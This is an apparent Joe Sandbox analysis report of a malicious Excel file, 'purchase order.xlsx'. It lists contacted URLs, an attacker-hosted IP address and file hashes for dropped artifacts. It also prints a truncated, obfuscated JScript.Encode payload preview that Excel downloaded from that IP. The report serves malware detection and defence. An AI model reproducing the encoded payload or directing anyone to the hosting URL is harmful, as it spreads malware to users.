                                                                                                      https://insertmedia.bing.office.net/odc/insertmedia34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                        high
                                                                                                        https://o365auditrealtimeingestion.manage.office.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office365.com/api/v1.0/me/Activities34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                            high
                                                                                                            https://api.office.net34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                              high
                                                                                                              https://incidents.diagnosticssdf.office.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                high
                                                                                                                https://asgsmsproxyapi.azurewebsites.net/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://clients.config.office.net/user/v1.0/android/policies34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                  high
                                                                                                                  https://entitlement.diagnostics.office.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                    high
                                                                                                                    https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                      high
                                                                                                                      https://substrate.office.com/search/api/v2/init34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                        high
                                                                                                                        https://outlook.office.com/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                          high
                                                                                                                          https://storage.live.com/clientlogs/uploadlocation34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                            high
                                                                                                                            https://outlook.office365.com/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                              high
                                                                                                                              https://webshell.suite.office.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                high
                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://substrate.office.com/search/api/v1/SearchHistory34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://management.azure.com/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://messaging.lifecycle.office.com/getcustommessage1634C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://clients.config.office.net/c2r/v1.0/InteractiveInstallation34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://login.windows.net/common/oauth2/authorize34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://graph.windows.net/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://api.powerbi.com/beta/myorg/imports34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://devnull.onenote.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://messaging.action.office.com/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://ncus.pagecontentsync.34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://messaging.office.com/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          172.245.119.48
                                                                                                                                                          unknownUnited States
                                                                                                                                                          36352AS-COLOCROSSINGUSfalse
                                                                                                                                                          Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                          Analysis ID:653502
                                                                                                                                                          Start date and time: 28/06/202210:43:182022-06-28 10:43:18 +02:00
                                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 6m 9s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:light
                                                                                                                                                          Sample file name:purchase order.xlsx
                                                                                                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                          Run name:Potential for more IOCs and behavior
                                                                                                                                                          Number of analysed new started processes analysed:29
                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • HDC enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal68.expl.winXLSX@10/24@0/1
                                                                                                                                                          EGA Information:Failed
                                                                                                                                                          HDC Information:Failed
                                                                                                                                                          HCA Information:
                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                          • Number of executed functions: 0
                                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Found application associated with file extension: .xlsx
                                                                                                                                                          • Adjust boot time
                                                                                                                                                          • Enable AMSI
                                                                                                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                          • Attach to Office via COM
                                                                                                                                                          • Scroll down
                                                                                                                                                          • Close Viewer
                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                          • TCP Packets have been reduced to 100
                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 52.109.32.24, 52.109.76.34, 52.109.88.37, 20.54.89.106, 52.242.101.226, 52.152.110.14, 20.223.24.244
                                                                                                                                                          • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                          • VT rate limit hit for: purchase order.xlsx
                                                                                                                                                          No simulations
                                                                                                                                                          No context
                                                                                                                                                          No context
                                                                                                                                                          No context
                                                                                                                                                          No context
                                                                                                                                                          No context
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):149126
                                                                                                                                                          Entropy (8bit):5.356744655596469
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:6cQW/gxgB5BQguw5/Q9DQC+zQWk4F77nXmvidkXx5ETLKz6e:FJQ9DQC+zcXwI
                                                                                                                                                          MD5:6FF92A7CC58B007B5CF50798752F5FF6
                                                                                                                                                          SHA1:B1500193F727C0943683A97216E28A9CEB39E45F
                                                                                                                                                          SHA-256:3BA0725357DE15FE94FA3B623E1C08191CEFF322EB8EC431404F306F15D8B7F4
                                                                                                                                                          SHA-512:0E67CE141AD773AB8C7D15AED840FE3DEB50D67DAF2AEE2B372CF46D309CB7BC3686076B8B167C0BB10DC569B58893F556F169430EA2A2C8F403596912415911
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-06-28T08:44:30">.. Build: 16.0.15420.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:PNG image data, 130 x 187, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):16424
                                                                                                                                                          Entropy (8bit):7.9810223666914055
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:rGO9ao+FvCVT/82OoZJh+5thcR6zPOkCpVP9o+axwZFl+v:6Olyc8cNpVlKoW
                                                                                                                                                          MD5:86212DE909C5057FF80D28C6BCDA1B97
                                                                                                                                                          SHA1:7B4846994D2A926D32AE44464802C8862D0D89AD
                                                                                                                                                          SHA-256:B796FFD015039600D93F191B42361B22A940F84BAADA5E4E7A9BD62829458BD0
                                                                                                                                                          SHA-512:DE7F37E3BF5A8E07BB5E323EA9A767CEE3856925DA332A4858C5D44A1B9635D9660BFE809BE6F6A8CCCB4EA3CD578CBE395A7B25AC30A89476353B898A585F4B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          Preview:.PNG........IHDR.............&......[iCCPICC Profile..x..Xy8U]._.....LNfB.."2.C..q...q...R...TR.SH"c2.HH.YI.I.....z.o.....[.u.......}.{....>|pp....H .-...v..X.1......&.{h.....,....0.([...[o.'_l#K..\..L.;...P.C3.a..@R0.....(.m.[Sp.)....P.......0."Z[j....{......K..w....@.J..%.@=.cu..Pwx....#.=... ....`..0/..L.u.Wa,L9.x.G@#.*p....s.Z.*.....oN....D..p..,w.........5......nggI..-...........\..o.h.p.#....7.u..........N.%...2....H.d?..:.*..D.O.G.N.........Ff..h.r.......{QPZ.[.R.K\W...~.(..C.8..r%..g...h......##..j.G..K4...j.....sO..^.~.....F..=&C..f3....4V.."6.m.NX.9..8.:F;.;'.Lu..z...v...Y.U...3......x.`.D.N..G|..O...9|!b)r-.:M...#.{...Y...s...P._w..R._..M..I...//.......22.<.:..=K.:........^..zW*G?.-/.^V~.......B."....%..>ea......*..7V5T..T.>....$.!..3.F.&./._5?|q..U...m.eI..+.W..........G.=4=U.n}L}......O.....Z.CG.G.G.^[.a~.7...|.a.........]?.}h.:5........O..&f.?.}Q...../_......._...k...U-...........9......_..A.P).(b.y....F.R....yK;G..........v........g...
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):344
                                                                                                                                                          Entropy (8bit):2.446884075910387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:YDRX/5OQHzqEkNslqg6lnW6kK0XgtjuYVz2tYVzfvt8J:Y1ROo6ClqgOnVp0NYVxVjw
                                                                                                                                                          MD5:00022229E61960C6F67FEA5ABD7CC7BF
                                                                                                                                                          SHA1:95550373818BBB679D2388324C94A949CFFF90D5
                                                                                                                                                          SHA-256:CA521CE8E4A2C824905F74E45089E94D008E3E346439ECB9146AAD551C609A0F
                                                                                                                                                          SHA-512:CE17174A7CD5F6063151FF025F50C2DB959421A529B45358750C6722E10FBD1E073970AD1809D03E86BF58AA9752EEA286907EF53630321D50146EA6FEBDF8F4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:....l................................... EMF....X...........................8...X....................?......F...X...L...GDIC..........#s....4...............................................................................8...............8...................................%...........%...........0...........K...................................
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):498420
                                                                                                                                                          Entropy (8bit):0.641121533751757
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:jXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:DXwBkNWZ3cjvmWa+VDO
                                                                                                                                                          MD5:B6B2AE798B3758B49D802640BD39AF32
                                                                                                                                                          SHA1:656AC44B76A94412C192609FBE730B73B238C3A9
                                                                                                                                                          SHA-256:6E281E82686640834CECC8BAECB83C1AEB68114A45299115D5B590E7C51E9332
                                                                                                                                                          SHA-512:375A29D725F6FD007BEE3C126165635DC89D16CAAB1FB0D5AD5AA87A1332E51EB55153D6216A954EA77E3B2DA11C35DAB2D428AAB7014B9813035964090F7DE8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:....l...............2...........m>..C... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................[$...(....f.[.@..%.......H...........,...RQ(]....................$Q(]........ ...Id.[........ ............d.[............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...........8...X............8.[........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....2.......L.......................P... ...6...F....F...F..EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):21741
                                                                                                                                                          Entropy (8bit):6.426960150522073
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:+z357eNbjcN0gKdG9iSrvx/oBqEq7LFGgsdHmYGvx:+pedjcP915/8nq7LFGndHOx
                                                                                                                                                          MD5:CDF5BDD4111E8CD5F0349DAFA4FD69D6
                                                                                                                                                          SHA1:93FBE5D73A10E5C80593BB765203B05642C38574
                                                                                                                                                          SHA-256:59AA679DE09E68BC33D33371FEEF67837410E0056C10A9D66D87F01F667DD006
                                                                                                                                                          SHA-512:7400E6CA2B650D0451EE923E2C0F036DEA165EE008BF1E50FECDD282794CF0F31975D4ED854E0440F314318C0E5AF99D0E5E048BBA636E3062D691B0101DB299
                                                                                                                                                          Malicious:false
                                                                                                                                                          IE Cache URL:http://172.245.119.48/shipping_invc/document.html
                                                                                                                                                          Preview:<!DOCTyPE hTML>....<hTmL>....<bODy>....<scRipT .TyPE="Text/jsCRipt.Encode">....//**sTArT encode**....#@~^S1QAAA==@#@&@#@&^W1lYbW. tM+WP{PE\kOHr~P3PJU9P)rP,_~J&r9J~P3~J,J~Q,Jw^.9k)Mg6rP~3Pr/K&mr~P3PEPrPQ~rO/0rJ,P_,EKJ,P3PEPE~3PEs}.J,PQ~rZ2E~,_~J,E,_~rzhbDrP,QPrb\J,PQ~rPJ,QPr-Jr~QPrqD{.2E~,_~J~.WS?nWKJP~Q,J.s&J.'E,P3PJ[b&PJ,_~J,J~Q,Jq:mSmEx14\+DtKNxZGUD+EP,QPr6O\rPPQ~r+UEr~,_~rPrP_,J&P{~J~P3PE.Kh/.oWMsk^E~P3Pr+EP~Q,JxJ,~_,J*zD^`E~3PEqAav^c&2o`B]?HdKA: KA6O .1ZK[q.oTEQ,Z_lMTX%Q,;C)DYX%3BiPw%R!n:?OI&UT`,U5kY2sR1617+]KYBQ,;tlMD*R_$1u)IY*R_vs]6tA)/A.ckY]rgo`vQ]mul"D2cQEj8I\1Z8Am0,%}j1P(;FM(f9G}?zO83wY\?)x8pg3[Z1{9wNC(G!oe."3J."X12iTSqFs(.xsmsIo}sV;joI9:TcT9FD38MX9(($\^U5W(xjzKAF-Pb*383SkJZ~9mMoHjy.!&fZLpyt4m^1s[;*.(hVN4 "sF.8h9.B/C.to^&"4NVV%(V.c[!jX8k~B(x]5N_qoj.x\IV,f4s6-eqIj(T}a4M`Gj.l!`C]X(3D(PZX"N_928smo^3k/^&"zm.X.qVw!"XXqlq*TqA.fJAVE9oAZmk~.e:1w}X^oJilt8.`Lq^spebqoJiltP.jP`MoN}UAY1XzOjVs"m8IG^.jG&/Io.LK.#.xH"M1&8hX\e."i4Z}28VjW\/SkCC"T1fG7S.2&tkWz1Gj;H:2XJNpcd"o2HZO+e:tE\(4V(rSkBMj6NN
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3584
                                                                                                                                                          Entropy (8bit):3.09405754705922
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:etGSBm9pz1qlkCe745Q7GslPorPjvX5ekjV4gztkZfPy6Iv+SnOBWI+ycuZhNSGX:6Upqb927GslPIDRjyJP0Ok1ul7a3Xq
                                                                                                                                                          MD5:9AECF9FCAD18AD5C87157D7A648B6BD4
                                                                                                                                                          SHA1:C30F06A3A49A0F52ECC64FF544159AB46E09B084
                                                                                                                                                          SHA-256:884C79B3C442E367C47C28CE379460E8EC0849D4C4D6381657794F40B2A7CB67
                                                                                                                                                          SHA-512:CE0425D8EC6E3104A8E02DDD1A40D8B22F27CF600BF2D730AA29C904C6C619B2667784ECD66FFB8B9FC717C19293AC0D4877D3D0B0AFAC15A772E7C7A5683E74
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!.................%... ...@....... ....................................@..................................$..K....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ..4............................................................0..6....... ....s........o....(....,..o....r...pr...po....*~....*F.r...pr...po....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......t...#Blob...........W=........%3............................................................................2.+...N.B.....................0.....W.......+.............................Q.9.......... \.....P ......j...... ..
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                          File Type:MSVC .res
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):652
                                                                                                                                                          Entropy (8bit):3.11907740507641
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grykGak7YnqqlXPN5Dlq5J:+RI+ycuZhNSGakSlXPNnqX
                                                                                                                                                          MD5:85E307F916985ED8227C37FD6EAAD243
                                                                                                                                                          SHA1:72F137CA124C6E97E4546458E2F076B75A2927DE
                                                                                                                                                          SHA-256:23C6B12E792794E645586D3E40359BDE672C6618968B96A525030C4D3F36F414
                                                                                                                                                          SHA-512:1C1D539D6631373D01238A80142B253EAEA39740955EE8E8B452645D69BFCA25D99CBEC10BE44D0A2DC4BFD52EFE5A972CEEA467CC385C0929410CB46D5CC307
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.f.y.o.f.3.j.w...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.f.y.o.f.3.j.w...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1364
                                                                                                                                                          Entropy (8bit):4.1027541743460825
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:H4C9A++fCXXOODfHNhKYDfII+ycuZhNSGakSlXPNnq9Wd:ixCXXO07K2g1ul7a3Xq9m
                                                                                                                                                          MD5:8FEBD54D47AB795291C00E5A653BE4F6
                                                                                                                                                          SHA1:F1223492FCCFFDF42690645083E72AEE47618D18
                                                                                                                                                          SHA-256:0B69D1611DEA610CBDE2B25572D75CC2749E05EB36ECAD7E5D33A3BB5772896A
                                                                                                                                                          SHA-512:9B634837EA9FD829CFE4BEE2EDE06C706E85787058241CDCA11BF66DC4D6BAE10CCD96CD5591EB165D590A7E1A0C3A32E0A97A92D4522C0FD677C609317BD986
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:L.....b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP.....................^."|7.n..C..........4.......C:\Users\user\AppData\Local\Temp\RES13B6.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.f.y.o.f.3.j.w...d.l.l.....(.....L.e.g.a.l.C.o.p.
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1364
                                                                                                                                                          Entropy (8bit):4.114314965892433
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:H6gC9AWZfEGTFw0DfHWFhKYDfII+ycuZhNnakSJPNnq9Wd:fWBZTFwy2zK2g1ulna3rq9m
                                                                                                                                                          MD5:8F7E3DC0BAFE313F5CD4C9AF8D658E10
                                                                                                                                                          SHA1:4B3A6AEE81EE79CED7D9B6A13A52407D67AC4C9D
                                                                                                                                                          SHA-256:4F3476B8E205E0B0908EBD5F50CBFA9776823AECC322FBE2F33366252BCC429A
                                                                                                                                                          SHA-512:CD52EAB587B8F33B85E5458CE4DD1FA8455F43C1DE14E6C896161D095551FDB74C313BDE226E35D5ACCDE2AC8132B62214DFCFA16F0650D10BBB8311F341BE89
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:L.....b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........S....c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP..................X...K.....u..........4.......C:\Users\user\AppData\Local\Temp\RESF139.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.y.h.n.g.m.v.t...d.l.l.....(.....L.e.g.a.l.C.o.p.
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                          File Type:MSVC .res
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):652
                                                                                                                                                          Entropy (8bit):3.095959176124916
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grykaak7YnqqNrPN5Dlq5J:+RI+ycuZhNnakSJPNnqX
                                                                                                                                                          MD5:E4A1CF9558A786A84B1619C8E5EDAD75
                                                                                                                                                          SHA1:D45ABADD224059F87E1FDF4E2EE2CF16A9DDAA1D
                                                                                                                                                          SHA-256:EFDC4288424F961795D5E2C02F93CDD08C0581BA9F6F5A82474732471A4FA216
                                                                                                                                                          SHA-512:624668625F58B06B84E82B984E34059F14F6EE4C25AFBCB192A2DFC2338285C79B5872B4F8167695C2659D52E2031342BEC78C8F449C6F58FA3CA176021DFF47
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.y.h.n.g.m.v.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.y.h.n.g.m.v.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5120
                                                                                                                                                          Entropy (8bit):3.7814229864516253
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:63oPhmKraYZkH8KTibUyXkwjj0JOC+CFSlwY9c1ulna3rq:1DaAkHHo5k8hCuZlK
                                                                                                                                                          MD5:CA38C4E07EE62DF319C8D61BFDB96BCA
                                                                                                                                                          SHA1:8840EFA9C96F5793650FDB7EB7396A4910082235
                                                                                                                                                          SHA-256:B557E8D652DBB7E83CBE18AF2557802FCD2B435EE30CD052E60D44C77844074E
                                                                                                                                                          SHA-512:C8162752A07C0970A9247F389BF5774ED1EFDB73F6319DFED55AAD190E2F6C33E6FB9D487EB9AA616A9C1E5BE1F5D7199A1339A2E9D0483F047DE40860B700B5
                                                                                                                                                          Malicious:false
